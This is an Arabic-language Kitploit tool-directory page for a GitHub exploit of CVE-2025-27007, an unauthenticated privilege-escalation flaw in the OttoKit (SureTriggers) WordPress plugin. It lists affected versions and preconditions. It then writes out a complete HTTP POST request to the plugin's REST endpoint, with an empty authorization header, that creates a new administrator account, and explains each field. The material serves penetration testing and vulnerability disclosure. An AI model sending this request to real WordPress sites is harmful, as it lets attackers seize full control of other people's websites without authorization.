Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-27007-OttoKit-exploit — استغلال CVE-2025-27007، وهي ثغرة حرجة لتصعيد الامتيازات غير المصادق عليها في إضافة ووردبريس OttoKit (المعروفة سابقًا باسم SureTriggers) | Kitploit
أدوات/GitHubGitHub/absholi7ly/cve-2025-27007-ottokit-exploit
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقةالفريق الأحمر
GitHubabsholi7ly/cve-2025-27007-ottokit-exploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-27007-OttoKit-exploit

استغلال CVE-2025-27007، وهي ثغرة حرجة لتصعيد الامتيازات غير المصادق عليها في إضافة ووردبريس OttoKit (المعروفة سابقًا باسم SureTriggers)

عرض المستودع
2منذ سنة واحدةلم تتم المراجعة بعد

CVE-2025-27007: ثغرة تصعيد الامتيازات في OttoKit (SureTriggers)

استغلال ثغرة CVE-2025-27007، وهي ثغرة حرجة في تصعيد الامتيازات غير المصرح به في إضافة OttoKit (المعروفة سابقًا باسم SureTriggers) لووردبريس. يوضح هذا المستودع كيف يمكن للمهاجم إنشاء حساب مدير على موقع ووردبريس ضعيف.

الإصدارات المتأثرة

  • جميع إصدارات OttoKit (SureTriggers) ≤ 1.0.82.
  • تم إصلاحها في الإصدار 1.0.83.

شروط الاستغلال

يمكن استغلال الثغرة في الظروف التالية:

  1. يجب أن تكون إضافة OttoKit مثبتة ومفعلة على موقع ووردبريس المستهدف.
  2. الإضافة غير مهيأة (مثل عدم وجود مفتاح API أو "secret_key" في قاعدة البيانات).
  3. يعرض الموقع المستهدف نقطة نهاية REST API '/wp-json/sure-triggers/v1/automation/action'.

طلب HTTP

يستهدف الطلب التالي نقطة النهاية /wp-json/sure-triggers/v1/automation/action لإنشاء حساب مدير:

root@kitploit:~
POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
Host: [target-site]
Content-Type: application/x-www-form-urlencoded
St-Authorization: 
Content-Length: [length]

selected_options[user_name]=new_admin&selected_options[user_email][email protected]&selected_options[password]=StrongP@ssw0rd123&selected_options[role]=administrator&aintegration=WordPress&type_event=create_user_if_not_exists


شرح الطلب

  • نقطة النهاية: POST /wp-json/sure-triggers/v1/automation/action
  • St-Authorization: (فارغ): يتجاوز المصادقة عندما تكون الإضافة غير مهيأة.
  • selected_options[user_name]: اسم المستخدم للحساب الجديد (مثل new_admin).
  • selected_options[user_email]: البريد الإلكتروني للحساب الجديد (مثل [email protected]).
  • selected_options[password]: كلمة المرور للحساب الجديد (مثل StrongP@ssw0rd123).
  • selected_options[role]: يتم تعيينه إلى administrator لمنح صلاحيات كاملة.
  • type_event: يتم تعيينه إلى create_user_if_not_exists لتفعيل إنشاء المستخدم
تنزيل الأداة